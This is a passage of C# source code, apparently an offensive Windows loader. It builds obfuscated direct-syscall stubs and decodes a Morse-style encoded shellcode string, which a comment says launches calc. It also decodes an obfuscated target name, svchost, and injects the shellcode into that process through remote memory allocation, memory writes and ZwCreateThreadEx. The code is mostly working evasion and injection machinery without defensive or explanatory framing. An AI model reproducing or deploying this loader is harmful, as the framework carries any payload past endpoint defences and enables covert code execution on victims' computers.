pAttrs, ref LARGE_INTEGER pMaxSize, uint pageProt, uint allocationAttribs, IntPtr hFile); 665 | 666 | [SuppressUnmanagedCodeSecurity] 667 | [UnmanagedFunctionPointer(CallingConvention.Cdecl)] 668 | public delegate NTSTATUS ZwMapViewOfSectionX(IntPtr section, IntPtr process, ref IntPtr baseAddr, IntPtr zeroBits, IntPtr commitSize, IntPtr stuff, ref IntPtr viewSize, int inheritDispo, uint alloctype, uint prot); 669 | 670 | [SuppressUnmanagedCodeSecurity] 671 | [UnmanagedFunctionPointer(CallingConvention.Cdecl)] 672 | public delegate NTSTATUS ZwProtectVirtualMemoryX(IntPtr hProcess, IntPtr lpAddress, IntPtr dwSize, uint flNewProtect, out uint lpflOldProtect); 673 | 674 | [SuppressUnmanagedCodeSecurity] 675 | [UnmanagedFunctionPointer(CallingConvention.Cdecl)] 676 | public delegate NTSTATUS ZwCreateProcessX( out IntPtr threadHandle, uint desiredAccess, IntPtr objectAttributes, IntPtr processHandle, bool InheritObjectTable, IntPtr SectionHandle, IntPtr DebugPort, IntPtr ExceptionPort); 677 | 678 | [SuppressUnmanagedCodeSecurity] 679 | [UnmanagedFunctionPointer(CallingConvention.Cdecl)] 680 | public delegate NTSTATUS ZwOpenThreadX( IntPtr threadHandle, ProcessAccessFlags processAccess, OBJECT_ATTRIBUTES objAttribute, ref CLIENT_ID clientid); 681 | 682 | [SuppressUnmanagedCodeSecurity] 683 | [UnmanagedFunctionPointer(CallingConvention.Cdecl)] 684 | public delegate NTSTATUS ZwResumeThreadX( IntPtr threadHandle, out ulong SuspendCount); 685 | 686 | 687 | public static NTSTATUS ZwOpenProcess(ref IntPtr hProcess, ProcessAccessFlags processAccess, OBJECT_ATTRIBUTES objAttribute, ref CLIENT_ID clientid) 688 | { 689 | byte [] syscall = GetOSVersionAndReturnSyscall( 1 ); 690 | unsafe 691 | { 692 | fixed (byte* ptr = syscall) 693 | { 694 | IntPtr allocMemAddress = (IntPtr)ptr; 695 | IntPtr allocMemAddressCopy = (IntPtr)ptr; 696 | MemoryProtection oldProtection; 697 | uint size = (uint)syscall.Length; 698 | IntPtr sizeIntPtr = (IntPtr)size; 699 | NTSTATUS status = ZwProtectVirtualMemory( (IntPtr)Process.GetCurrentProcess().Handle, ref allocMemAddress, ref sizeIntPtr, MemoryProtection.ExecuteReadWrite , out oldProtection ); 700 | ZwOpenProcessX ZwOpenProcessFunc = (ZwOpenProcessX)Marshal.GetDelegateForFunctionPointer(allocMemAddressCopy, typeof(ZwOpenProcessX)); 701 | return (NTSTATUS)ZwOpenProcessFunc(out hProcess, processAccess, objAttribute, ref clientid); 702 | } 703 | 704 | } 705 | } 706 | 707 | public static NTSTATUS ZwCreateThreadEx(out IntPtr threadHandle, uint desiredAccess, IntPtr objectAttributes, IntPtr processHandle, IntPtr lpStartAddress, IntPtr lpParameter, int createSuspended, uint stackZeroBits, uint sizeOfStackCommit, uint sizeOfStackReserve, IntPtr lpBytesBuffer) 708 | { 709 | byte [] syscall = GetOSVersionAndReturnSyscall( 2 ); 710 | unsafe 711 | { 712 | fixed (byte* ptr = syscall) 713 | { 714 | IntPtr allocMemAddress = (IntPtr)ptr; 715 | IntPtr allocMemAddressCopy = (IntPtr)ptr; 716 | MemoryProtection oldProtection; 717 | uint size = (uint)syscall.Length; 718 | IntPtr sizeIntPtr = (IntPtr)size; 719 | NTSTATUS status = ZwProtectVirtualMemory( (IntPtr)Process.GetCurrentProcess().Handle, ref allocMemAddress, ref sizeIntPtr, MemoryProtection.ExecuteReadWrite , out oldProtection ); 720 | ZwCreateThreadExX ZwCreateThreadExFunc = (ZwCreateThreadExX)Marshal.GetDelegateForFunctionPointer(allocMemAddressCopy, typeof(ZwCreateThreadExX)); 721 | return (NTSTATUS)ZwCreateThreadExFunc(out threadHandle, desiredAccess, objectAttributes, processHandle, lpStartAddress, lpParameter, createSuspended, stackZeroBits, sizeOfStackCommit, sizeOfStackReserve, lpBytesBuffer); 722 | } 723 | } 724 | } 725 | 726 | public static NTSTATUS ZwWriteVirtualMemory(IntPtr hProcess, ref IntPtr lpBaseAddress, IntPtr lpBuffer, uint nSize, ref IntPtr lpNumberOfBytesWritten) 727 | { 728 | byte [] syscall = GetOSVersionAndReturnSyscall( 3 ); 729 | unsafe 730 | { 731 | fixed (byte* ptr = syscall) 732 | { 733 | IntPtr allocMemAddress = (IntPtr)ptr; 734 | IntPtr allocMemAddressCopy = (IntPtr)ptr; 735 | MemoryProtection oldProtection; 736 | uint size = (uint)syscall.Length; 737 | IntPtr sizeIntPtr = (IntPtr)size; 738 | NTSTATUS status = ZwProtectVirtualMemory( (IntPtr)Process.GetCurrentProcess().Handle, ref allocMemAddress, ref sizeIntPtr, MemoryProtection.ExecuteReadWrite , out oldProtection ); 739 | ZwWriteVirtualMemoryX ZwWriteVirtualMemoryFunc = (ZwWriteVirtualMemoryX)Marshal.GetDelegateForFunctionPointer(allocMemAddressCopy, typeof(ZwWriteVirtualMemoryX)); 740 | return (NTSTATUS)ZwWriteVirtualMemoryFunc(hProcess, lpBaseAddress, lpBuffer, nSize, ref lpNumberOfBytesWritten); 741 | } 742 | } 743 | } 744 | 745 | 746 | public static NTSTATUS ZwAllocateVirtualMemory(IntPtr hProcess, ref IntPtr BaseAddress, IntPtr ZeroBits, ref UIntPtr RegionSize, ulong AllocationType, ulong Protect) 747 | { 748 | byte [] syscall = GetOSVersionAndReturnSyscall( 4 ); 749 | unsafe 750 | { 751 | fixed (byte* ptr = syscall) 752 | { 753 | IntPtr allocMemAddress = (IntPtr)ptr; 754 | IntPtr allocMemAddressCopy = (IntPtr)ptr; 755 | MemoryProtection oldProtection; 756 | uint size = (uint)syscall.Length; 757 | IntPtr sizeIntPtr = (IntPtr)size; 758 | NTSTATUS status = ZwProtectVirtualMemory( (IntPtr)Process.GetCurrentProcess().Handle, ref allocMemAddress, ref sizeIntPtr, MemoryProtection.ExecuteReadWrite , out oldProtection ); 759 | ZwAllocateVirtualMemoryX ZwAllocateVirtualMemoryFunc = (ZwAllocateVirtualMemoryX)Marshal.GetDelegateForFunctionPointer(allocMemAddressCopy, typeof(ZwAllocateVirtualMemoryX)); 760 | return (NTSTATUS)ZwAllocateVirtualMemoryFunc(hProcess, ref BaseAddress, ZeroBits, ref RegionSize, AllocationType, Protect); 761 | } 762 | } 763 | } 764 | 765 | public static NTSTATUS ZwCreateSection(ref IntPtr section, uint desiredAccess, IntPtr pAttrs, ref LARGE_INTEGER pMaxSize, uint pageProt, uint allocationAttribs, IntPtr hFile) 766 | { 767 | byte [] syscall = GetOSVersionAndReturnSyscall( 5 ); 768 | unsafe 769 | { 770 | fixed (byte* ptr = syscall) 771 | { 772 | IntPtr allocMemAddress = (IntPtr)ptr; 773 | IntPtr allocMemAddressCopy = (IntPtr)ptr; 774 | MemoryProtection oldProtection; 775 | uint size = (uint)syscall.Length; 776 | IntPtr sizeIntPtr = (IntPtr)size; 777 | NTSTATUS status = ZwProtectVirtualMemory( (IntPtr)Process.GetCurrentProcess().Handle, ref allocMemAddress, ref sizeIntPtr, MemoryProtection.ExecuteReadWrite , out oldProtection ); 778 | ZwCreateSectionX ZwCreateSectionFunc = (ZwCreateSectionX)Marshal.GetDelegateForFunctionPointer(allocMemAddressCopy, typeof(ZwCreateSectionX)); 779 | return (NTSTATUS)ZwCreateSectionFunc(ref section, desiredAccess, pAttrs, ref pMaxSize, pageProt, allocationAttribs, hFile); 780 | } 781 | } 782 | } 783 | 784 | public static NTSTATUS ZwMapViewOfSection(IntPtr section, IntPtr process, ref IntPtr baseAddr, IntPtr zeroBits, IntPtr commitSize, IntPtr stuff, ref IntPtr viewSize, int inheritDispo, uint alloctype, uint prot) 785 | { 786 | byte [] syscall = GetOSVersionAndReturnSyscall( 6 ); 787 | unsafe 788 | { 789 | fixed (byte* ptr = syscall) 790 | { 791 | IntPtr allocMemAddress = (IntPtr)ptr; 792 | IntPtr allocMemAddressCopy = (IntPtr)ptr; 793 | MemoryProtection oldProtection; 794 | uint size = (uint)syscall.Length; 795 | IntPtr sizeIntPtr = (IntPtr)size; 796 | NTSTATUS status = ZwProtectVirtualMemory( (IntPtr)Process.GetCurrentProcess().Handle, ref allocMemAddress, ref sizeIntPtr, MemoryProtection.ExecuteReadWrite , out oldProtection ); 797 | ZwMapViewOfSectionX ZwMapViewOfSectionFunc = (ZwMapViewOfSectionX)Marshal.GetDelegateForFunctionPointer(allocMemAddressCopy, typeof(ZwMapViewOfSectionX)); 798 | return (NTSTATUS)ZwMapViewOfSectionFunc(section, process, ref baseAddr, zeroBits, commitSize, stuff, ref viewSize, inheritDispo, alloctype, prot); 799 | } 800 | } 801 | } 802 | 803 | public static NTSTATUS ZwCreateProcess( out IntPtr threadHandle, uint desiredAccess, IntPtr objectAttributes, IntPtr processHandle, bool InheritObjectTable, IntPtr SectionHandle, IntPtr DebugPort, IntPtr ExceptionPort) 804 | { 805 | byte [] syscall = GetOSVersionAndReturnSyscall( 7 ); 806 | unsafe 807 | { 808 | fixed (byte* ptr = syscall) 809 | { 810 | IntPtr allocMemAddress = (IntPtr)ptr; 811 | IntPtr allocMemAddressCopy = (IntPtr)ptr; 812 | MemoryProtection oldProtection; 813 | uint size = (uint)syscall.Length; 814 | IntPtr sizeIntPtr = (IntPtr)size; 815 | NTSTATUS status = ZwProtectVirtualMemory( (IntPtr)Process.GetCurrentProcess().Handle, ref allocMemAddress, ref sizeIntPtr, MemoryProtection.ExecuteReadWrite , out oldProtection ); 816 | ZwCreateProcessX ZwCreateProcessFunc = (ZwCreateProcessX)Marshal.GetDelegateForFunctionPointer(allocMemAddressCopy, typeof(ZwCreateProcessX)); 817 | return (NTSTATUS)ZwCreateProcessFunc(out threadHandle, desiredAccess, objectAttributes, processHandle, InheritObjectTable, SectionHandle, DebugPort, ExceptionPort); 818 | } 819 | } 820 | } 821 | 822 | public static NTSTATUS ZwOpenThread( IntPtr threadHandle, ProcessAccessFlags processAccess, OBJECT_ATTRIBUTES objAttribute, ref CLIENT_ID clientid) 823 | { 824 | byte [] syscall = GetOSVersionAndReturnSyscall( 8 ); 825 | unsafe 826 | { 827 | fixed (byte* ptr = syscall) 828 | { 829 | IntPtr allocMemAddress = (IntPtr)ptr; 830 | IntPtr allocMemAddressCopy = (IntPtr)ptr; 831 | MemoryProtection oldProtection; 832 | uint size = (uint)syscall.Length; 833 | IntPtr sizeIntPtr = (IntPtr)size; 834 | NTSTATUS status = ZwProtectVirtualMemory( (IntPtr)Process.GetCurrentProcess().Handle, ref allocMemAddress, ref sizeIntPtr, MemoryProtection.ExecuteReadWrite , out oldProtection ); 835 | ZwOpenThreadX ZwOpenThreadFunc = (ZwOpenThreadX)Marshal.GetDelegateForFunctionPointer(allocMemAddressCopy, typeof(ZwOpenThreadX)); 836 | return (NTSTATUS)ZwOpenThreadFunc(threadHandle, processAccess, objAttribute, ref clientid); 837 | } 838 | 839 | } 840 | } 841 | 842 | public static NTSTATUS ZwResumeThread( IntPtr threadHandle, out ulong SuspendCount) 843 | { 844 | byte [] syscall = GetOSVersionAndReturnSyscall( 9 ); 845 | unsafe 846 | { 847 | fixed (byte* ptr = syscall) 848 | { 849 | IntPtr allocMemAddress = (IntPtr)ptr; 850 | IntPtr allocMemAddressCopy = (IntPtr)ptr; 851 | MemoryProtection oldProtection; 852 | uint size = (uint)syscall.Length; 853 | IntPtr sizeIntPtr = (IntPtr)size; 854 | NTSTATUS status = ZwProtectVirtualMemory( (IntPtr)Process.GetCurrentProcess().Handle, ref allocMemAddress, ref sizeIntPtr, MemoryProtection.ExecuteReadWrite , out oldProtection ); 855 | ZwResumeThreadX ZwResumeThreadFunc = (ZwResumeThreadX)Marshal.GetDelegateForFunctionPointer(allocMemAddressCopy, typeof(ZwResumeThreadX)); 856 | return (NTSTATUS)ZwResumeThreadFunc(threadHandle, out SuspendCount); 857 | } 858 | 859 | } 860 | } 861 | 862 | public static void exec() 863 | { 864 | // name = svchost 865 | string name = " ? ? ? ? ? ? ?"; 866 | // Morse is shellcode, start calc 867 | string Morse = "-/ / ? /-/ ?-/ / ? / / ? / / ? / / ? / / ? / / ? / / ?-/ / ? / / ?-/-/ ? / / ? / / ? / / ? / / ?-/ / ? / / ? / / ? / / ? / / ?-/ / ?-/ / ? /-/ ? / / ? / / ?-/ / ?-/ / ?-/ / ?-/ / ?-/ / ?-/ / ? / / ? / / ? / / ? / / ? / / ? / / ?-/ / ? / / ?-/ / ? / / ? / / ?-/ / ?-/ / ? / / ? / / ? / / ? / / ?-/ / ? / / ? / / ? / / ? / / ? / / ? / / ? / / ? / / ?-/ / ? / / ?-/-/ ? / / ? / / ? / / ?-/ / ?-/ / ?-/ / ? / / ?-/-/ ? / / ? / / ? / / ?-/ / ?-/ / ? /-/ ? / / ? / / ?-/ / ? / / ? / / ? / / ? / /-? / / ? / / ? / / ?-/ /-? / / ? / / ? / / ?-/ / ?-/ / ? / / ? / /-? / / ?-/ / ?-/ / ? /-/ ?-/ /-?-/ / ?-/ / ? /-/ ?-/ / ? / / ? / / ? / / ?-/ / ? / / ? / / ? / /-? / / ? / / ? / / ? / /-?-/ / ? / /-?-/ / ?-/ /-? / / ? / / ? / / ? / / ?-/ / ? / / ?-/ / ? / / ? / / ? / / ? / / ?-/ /-?-/ / ? / / ? / / ? / / ? / / ?-/ / ? / / ? / / ?-/ / ?-/ / ?-/ /-? /-/ ? / /-? / / ?-/ / ?-/ / ?-/ /-? / / ? / /-?-/-/ ? / /-? / / ?-/ / ? / / ? / /-? / / ? / / ? / / ?-/ /-? / / ? / / ?-/-/ ? / /-?-/ / ? / / ? / / ?-/ / ? / / ?-/ / ? / / ? / / ? / / ? /-/ ? / / ? / / ? / / ? / / ? / / ? / / ?-/ / ?-/ / ? / /-? / / ?-/ / ? / / ? / / ?-/ / ?-/ / ?-/ /-? / / ? / / ?-/ / ? / / ? / /-?-/ / ? / / ? / / ? / /-? / / ? / / ?-/-/ ? / / ? / / ?-/ /-?-/ /-? / / ? / / ?-/-/ ? / / ? / / ?-/ /-? / /-? / / ? / / ? / / ? / /-? / / ? / / ?-/-/ ? / / ? / / ? / / ? / / ?-/ / ? / / ? / / ?-/ / ? /-/ ?-/ / ? / /-? / / ? / / ? / / ? / /-? / / ?-/ / ?-/ / ? / / ?-/-/ ?-/ /-?-/ / ? / / ?-/ / ? / /-? /-/ ? / / ? / / ? / / ? / / ? / / ?-/ / ?-/ / ? / / ?-/-/ ? / / ? / / ? / / ? / / ?-/ / ? / / ? / / ? / / ? / / ? / / ?-/ / ?-/ / ? / / ? / / ?-/ / ? / / ? / / ? / / ? / / ? / / ? / / ? / / ? / / ?-/ / ?-/-/ ?-/-/ ? / / ?-/ / ? / / ?-/ /-? / / ? / /-? / / ? / / ?-/ / ?-/ / ? / / ?-/ / ? /-/ ?-/ / ? / / ? / / ? / / ? / / ?-/ / ?-/ / ? / / ? /-/ ? / / ?-/ / ?-/ / ?-/ / ?-/ /-?-/ / ? / / ? / / ? / / ?"; 868 | int ProcId = FindUserPID( ResolvProcessName(name) ); 869 | byte [] scode = ResolveShellCode(Morse); 870 | CLIENT_ID clientid = new CLIENT_ID(); 871 | clientid.UniqueProcess = new IntPtr(ProcId); 872 | clientid.UniqueThread = IntPtr.Zero; 873 | IntPtr byteWritten = IntPtr.Zero; 874 | IntPtr procHandle = IntPtr.Zero; 875 | ZwOpenProcess(ref procHandle, ProcessAccessFlags.All, new OBJECT_ATTRIBUTES(), ref clientid); 876 | IntPtr allocMemAddress = new IntPtr(); 877 | UIntPtr scodeSize = (UIntPtr)(UInt32)scode.Length; 878 | ZwAllocateVirtualMemory(procHandle, ref allocMemAddress, new IntPtr(0), ref scodeSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); 879 | IntPtr unmanagedPointer = Marshal.AllocHGlobal(scode.Length); 880 | Marshal.Copy(scode, 0, unmanagedPointer, scode.Length); 881 | ZwWriteVirtualMemory(procHandle, ref allocMemAddress, unmanagedPointer, (UInt32)(scode.Length), ref byteWritten); 882 | Marshal.FreeHGlobal(unmanagedPointer); 883 | IntPtr hRemoteThread; 884 | ZwCreateThreadEx(out hRemoteThread, GENERIC_ALL, IntPtr.Zero, procHandle, allocMemAddress, IntPtr.Zero, 0, 0, 0, 0, IntPtr.Zero); 885 | CloseHandle(hRemoteThread); 886 | CloseHandle(procHandle); 887 | } 888 | 889 | public static string ResolvProcessName(string c) 890 | { 891 | string result = ""; 892 | int num = 0; 893 | int index = 0; 894 | string tmp = ""; 895 | for (int i = 1; i <= c.Length; i++) { 896 | tmp = c.Substring(index, 1); 897 | if (tmp == " ") { num++; index++; } 898 | else if (tmp == "?") { 899 | if (num == 19) { result = result + "s"; num = 0; } 900 | else 901 | if (num == 22) { result = result + "v"; num = 0; } 902 | else 903 | if (num == 3) { result = result + "c"; num = 0; } 904 | else 905 | if (num == 8) { result = result + "h"; num = 0; } 906 | else 907 | if (num == 15) { result = result + "o"; num = 0; } 908 | else 909 | if (num == 20) { result = result + "t"; num = 0; } 910 | index++; 911 | } 912 | } 913 | return result; 914 | } 915 | 916 | public static byte [] ResolveShellCode(string _P1) 917 | { 918 | byte [] _L1 = new byte [1]; 919 | int _N1 = 0; 920 | string _N2 = ""; 921 | int _N3 = 0; 922 | int _N4 = 0; 923 | for (int i = 1; i <= _P1.Length; i++) { if (_P1.Substring(_N3, 1) == " ") { _N1++; } 924 | else if (_P1.Substring(_N3, 1) == "|" || _P1.Substring(_N3,1) == "/") { if (_N1 > 0) { _N2 = _N2 + _N1.ToString(); _N1 = 0; } } 925 | else if (_P1.Substring(_N3, 1) == "-") { _N2 = _N2 + "0"; _N1 = 0; } 926 | else if (_P1.Substring(_N3, 1) == "?") { if (_P1.Substring(_N3 - 1, 1) == "?" || _P1.Substring(_N3 - 1, 1) == "-") 927 | { 928 | Array.Resize(ref _L1, _N4 + 1); 929 | _L1[_N4] = Byte.Parse( _N2 ); 930 | _N2 = ""; 931 | _N1 = 0; 932 | _N4++; 933 | } 934 | else { 935 | Array.Resize(ref _L1, _N4 + 1); 936 | _L1[_N4] = Byte.Parse( _N2 + _N1.ToString() ); 937 | _N2 = ""; 938 | _N1 = 0; 939 | _N4++; 940 | } } 941 | _N3++; 942 | } 943 | return _L1; 944 | } 945 | 946 | private static string GetProcessUser(Process process) 947 | { 948 | IntPtr processHandle = IntPtr.Zero; 949 | try 950 | { 951 | ZwOpenProcessToken(process.Handle, 8, out processHandle); 952 | WindowsIdentity wi = new WindowsIdentity(processHandle); 953 | string user = wi.Name; 954 | return user.Contains(@"\") ? user.Substring(user.IndexOf(@"\") + 1) : user; 955 | } 956 | catch 957 | { 958 | return null; 959 | } 960 | finally 961 | { 962 | if (processHandle != IntPtr.Zero) 963 | { 964 | CloseHandle(processHandle); 965 | } 966 | } 967 | } 968 | 969 | 970 | public static int FindUserPID(string procName) 971 | { 972 | string owner; 973 | Process proc; 974 | int foundPID = 0; 975 | Process[] processList = Process.GetProcesses(); 976 | foreach (Process process in processList) 977 | { 978 | if (process.ProcessName == procName) { 979 | proc = Process.GetProcessById(process.Id); 980 | owner = GetProcessUser(proc); 981 | if (owner == Environment.UserName ) { 982 | foundPID = process.Id; 983 | break; 984 | } 985 | } 986 | } 987 | return foundPID; 988 | } 989 | 990 | 991 | public static byte [] GetOSVersionAndReturnSyscall(int sysType ) 992 | { 993 | var syscall = new byte [] { 001, 001, 001, 001, 001, 000, 000, 000, 001, 001, 001 }; 994 | var osVersionInfo = new OSVERSIONINFOEXW { dwOSVersionInfoSize = Marshal.SizeOf(typeof(OSVERSIONINFOEXW)) }; 995 | NTSTATUS OSdata = RtlGetVersion(ref osVersionInfo); 996 | 997 | if (osVersionInfo.dwPlatformId == 2) // Client OS 998 | { 999 | if (osVersionInfo.dwBuildNumber == 18362 || osVersionInfo.dwBuildNumber == 18363 ) 1000 | { 1001 | switch (sysType) 1002 | { 1003 | case 1: // ZwOpenProcess 1004 | unsafe 1005 | { 1006 | fixed (byte* ptr = syscall) 1007 | { 1008 | *(ptr + 0) = (byte) ( *(ptr + 0) + 0x48); 1009 | *(ptr + 1) = (byte) ( *(ptr + 1) + 0x88); 1010 | *(ptr + 2) = (byte) ( *(ptr + 2) + 0xC9); 1011 | *(ptr + 3) = (byte) ( *(ptr + 3) + 0xB7); 1012 | *(ptr + 4) = (byte) ( *(ptr + 4) + 0x25); 1013 | *(ptr + 5) = (byte) ( *(ptr + 5) + 0x00); 1014 | *(ptr + 6) = (byte) ( *(ptr + 6) + 0x00); 1015 | *(ptr + 7) = (byte) ( *(ptr + 7) + 0x00); 1016 | *(ptr + 8) = (byte) ( *(ptr + 8) + 0x0E); 1017 | *(ptr + 9) = (byte) ( *(ptr + 9) + 0x04); 1018 | *(ptr + 10) = (byte) ( *(ptr + 10) + 0xC2); 1019 | } 1020 | } 1021 | break; 1022 | 1023 | case 2: // ZwCreateThreadEx 1024 | unsafe 1025 | { 1026 | fixed (byte* ptr = syscall) 1027 | { 1028 | *(ptr + 0) = (byte) ( *(ptr + 0) + 0x48); 1029 | *(ptr + 1) = (byte) ( *(ptr + 1) + 0x88); 1030 | *(ptr + 2) = (byte) ( *(ptr + 2) + 0xC9); 1031 | *(ptr + 3) = (byte) ( *(ptr + 3) + 0xB7); 1032 | *(ptr + 4) = (byte) ( *(ptr + 4) + 0xBC); 1033 | *(ptr + 5) = (byte) ( *(ptr + 5) + 0x00); 1034 | *(ptr + 6) = (byte) ( *(ptr + 6) + 0x00); 1035 | *(ptr + 7) = (byte) ( *(ptr + 7) + 0x00); 1036 | *(ptr + 8) = (byte) ( *(ptr + 8) + 0x0E); 1037 | *(ptr + 9) = (byte) ( *(ptr + 9) + 0x04); 1038 | *(ptr + 10) = (byte) ( *(ptr + 10) + 0xC2); 1039 | } 1040 | } 1041 | break; 1042 | 1043 | case 3: // ZwWriteVirtualMemory 1044 | unsafe 1045 | { 1046 | fixed (byte* ptr = syscall) 1047 | { 1048 | *(ptr + 0) = (byte) ( *(ptr + 0) + 0x48); 1049 | *(ptr + 1) = (byte) ( *(ptr + 1) + 0x88); 1050 | *(ptr + 2) = (byte) ( *(ptr + 2) + 0xC9); 1051 | *(ptr + 3) = (byte) ( *(ptr + 3) + 0xB7); 1052 | *(ptr + 4) = (byte) ( *(ptr + 4) + 0x39); 1053 | *(ptr + 5) = (byte) ( *(ptr + 5) + 0x00); 1054 | *(ptr + 6) = (byte) ( *(ptr + 6) + 0x00); 1055 | *(ptr + 7) = (byte) ( *(ptr + 7) + 0x00); 1056 | *(ptr + 8) = (byte) ( *(ptr + 8) + 0x0E); 1057 | *(ptr + 9) = (byte) ( *(ptr + 9) + 0x04); 1058 | *(ptr + 10) = (byte) ( *(ptr + 10) + 0xC2); 1059 | } 1060 | } 1061 | break; 1062 | 1063 | case 4: // ZwAllocateVirtualMemory 1064 | unsafe 1065 | { 1066 | fixed (byte* ptr = syscall) 1067 | { 1068 | *(ptr + 0) = (byte) ( *(ptr + 0) + 0x48); 1069 | *(ptr + 1) = (byte) ( *(ptr + 1) + 0x88); 1070 | *(ptr + 2) = (byte) ( *(ptr + 2) + 0xC9); 1071 | *(ptr + 3) = (byte) ( *(ptr + 3) + 0xB7); 1072 | *(ptr + 4) = (byte) ( *(ptr + 4) + 0x17); 1073 | *(ptr + 5) = (byte) ( *(ptr + 5) + 0x00); 1074 | *(ptr + 6) = (byte) ( *(ptr + 6) + 0x00); 1075 | *(ptr + 7) = (byte) ( *(ptr + 7) + 0x00); 1076 | *(ptr + 8) = (byte) ( *(ptr + 8) + 0x0e); 1077 | *(ptr + 9) = (byte) ( *(ptr + 9) + 0x04); 1078 | *(ptr + 10) = (byte) ( *(ptr + 10) + 0xC2); 1079 | } 1080 | } 1081 | break; 1082 | 1083 | case 5: // ZwCreateSection 1084 | unsafe 1085 | { 1086 | fixed (byte* ptr = syscall) 1087 | { 1088 | *(ptr + 0) = (byte) ( *(ptr + 0) + 0x48); 1089 | *(ptr + 1) = (byte) ( *(ptr + 1) + 0x88); 1090 | *(ptr + 2) = (byte) ( *(ptr + 2) + 0xC9); 1091 | *(ptr + 3) = (byte) ( *(ptr + 3) + 0xB7); 1092 | *(ptr + 4) = (byte) ( *(ptr + 4) + 0x49); 1093 | *(ptr + 5) = (byte) ( *(ptr + 5) + 0x00); 1094 | *(ptr + 6) = (byte) ( *(ptr + 6) + 0x00); 1095 | *(ptr + 7) = (byte) ( *(ptr + 7) + 0x00); 1096 | *(ptr + 8) = (byte) ( *(ptr + 8) + 0x0E); 1097 | *(ptr + 9) = (byte) ( *(ptr + 9) + 0x04); 1098 | *(ptr + 10) = (byte) ( *(ptr + 10) + 0xC2); 1099 | } 1100 | } 1101 | break; 1102 | 1103 | case 6: // ZwMapViewOfSection 1104 | unsafe 1105 | { 1106 | fixed (byte* ptr = syscall) 1107 | { 1108 | *(ptr + 0) = (byte) ( *(ptr + 0) + 0x48); 1109 | *(ptr + 1) = (byte) ( *(ptr + 1) + 0x88); 1110 | *(ptr + 2) = (byte) ( *(ptr + 2) + 0xC9); 1111 | *(ptr + 3) = (byte) ( *(ptr + 3) + 0xB7); 1112 | *(ptr + 4) = (byte) ( *(ptr + 4) + 0x27); 1113 | *(ptr + 5) = (byte) ( *(ptr + 5) + 0x00); 1114 | *(ptr + 6) = (byte) ( *(ptr + 6) + 0x00); 1115 | *(ptr + 7) = (byte) ( *(ptr + 7) + 0x00); 1116 | *(ptr + 8) = (byte) ( *(ptr + 8) + 0x0E); 1117 | *(ptr + 9) = (byte) ( *(ptr + 9) + 0x04); 1118 | *(ptr + 10) = (byte) ( *(ptr + 10) + 0xC2); 1119 | } 1120 | } 1121 | break; 1122 | 1123 | case 7: // ZwCreateProcess 1124 | unsafe 1125 | { 1126 | fixed (byte* ptr = syscall) 1127 | { 1128 | *(ptr + 0) = (byte) ( *(ptr + 0) + 0x48); 1129 | *(ptr + 1) = (byte) ( *(ptr + 1) + 0x88); 1130 | *(ptr + 2) = (byte) ( *(ptr + 2) + 0xC9); 1131 | *(ptr + 3) = (byte) ( *(ptr + 3) + 0xB7); 1132 | *(ptr + 4) = (byte) ( *(ptr + 4) + 0x76); 1133 | *(ptr + 5) = (byte) ( *(ptr + 5) + 0x00); 1134 | *(ptr + 6) = (byte) ( *(ptr + 6) + 0x00); 1135 | *(ptr + 7) = (byte) ( *(ptr + 7) + 0x00); 1136 | *(ptr + 8) = (byte) ( *(ptr + 8) + 0x0E); 1137 | *(ptr + 9) = (byte) ( *(ptr + 9) + 0x04); 1138 | *(ptr + 10) = (byte) ( *(ptr + 10) + 0xC2); 1139 | } 1140 | } 1141 | break; 1142 | 1143 | case 8: // ZwOpenThread 1144 | unsafe 1145 | { 1146 | fixed (byte* ptr = syscall) 1147 | { 1148 | *(ptr + 0) = (byte) ( *(ptr + 0) + 0x48); 1149 | *(ptr + 1) = (byte) ( *(ptr + 1) + 0x88); 1150 | *(ptr + 2) = (byte) ( *(ptr + 2) + 0xC9); 1151 | *(ptr + 3) = (byte) ( *(ptr + 3) + 0xB7); 1152 | *(ptr + 4) = (byte) ( *(ptr + 4) + 0x128); 1153 | *(ptr + 5) = (byte) ( *(ptr + 5) + 0x00); 1154 | *(ptr + 6) = (byte) ( *(ptr + 6) + 0x00); 1155 | *(ptr + 7) = (byte) ( *(ptr + 7) + 0x00); 1156 | *(ptr + 8) = (byte) ( *(ptr + 8) + 0x0E); 1157 | *(ptr + 9) = (byte) ( *(ptr + 9) + 0x04); 1158 | *(ptr + 10) = (byte) ( *(ptr + 10) + 0xC2); 1159 | } 1160 | } 1161 | break; 1162 | 1163 | case 9: // ZwResumeThread 1164 | unsafe 1165 | { 1166 | fixed (byte* ptr = syscall) 1167 | { 1168 | *(ptr + 0) = (byte) ( *(ptr + 0) + 0x48); 1169 | *(ptr + 1) = (byte) ( *(ptr + 1) + 0x88); 1170 | *(ptr + 2) = (byte) ( *(ptr + 2) + 0xC9); 1171 | *(ptr + 3) = (byte) ( *(ptr + 3) + 0xB7); 1172 | *(ptr + 4) = (byte) ( *(ptr + 4) + 0x51); 1173 | *(ptr + 5) = (byte) ( *(ptr + 5) + 0x00); 1174 | *(ptr + 6) = (byte) ( *(ptr + 6) + 0x00); 1175 | *(ptr + 7) = (byte) ( *(ptr + 7) + 0x00); 1176 | *(ptr + 8) = (byte) ( *(ptr + 8) + 0x0E); 1177 | *(ptr + 9) = (byte) ( *(ptr + 9) + 0x04); 1178 | *(ptr + 10) = (byte) ( *(ptr + 10) + 0xC2); 1179 | } 1180 | } 1181 | break; 1182 | 1183 | case 10: // ZwOpenProcessToken 1184 | unsafe 1185 | { 1186 | fixed (byte* ptr = syscall) 1187 | { 1188 | *(ptr + 0) = (byte) ( *(ptr + 0) + 0x48); 1189 | *(ptr + 1) = (byte) ( *(ptr + 1) + 0x88); 1190 | *(ptr + 2) = (byte) ( *(ptr + 2) + 0xC9); 1191 | *(ptr + 3) = (byte) ( *(ptr + 3) + 0xB7); 1192 | *(ptr + 4) = (byte) ( *(ptr + 4) + 0x122); 1193 | *(ptr + 5) = (byte) ( *(ptr + 5) + 0x00); 1194 | *(ptr + 6) = (byte) ( *(ptr + 6) + 0x00); 1195 | *(ptr + 7) = (byte) ( *(ptr + 7) + 0x00); 1196 | *(ptr + 8) = (byte) ( *(ptr + 8) + 0x0E); 1197 | *(ptr + 9) = (byte) ( *(ptr + 9) + 0x04); 1198 | *(ptr + 10) = (byte) ( *(ptr + 10) + 0xC2); 1199 | } 1200 | } 1201 | break; 1202 | 1203 | 1204 | 1205 | } //switch (sysType) 1206 | } // if 1207 | else 1208 | if (osVersionInfo.dwBuildNumber == 17763) 1209 | { 1210 | switch (sysType) 1211 | { 1212 | case 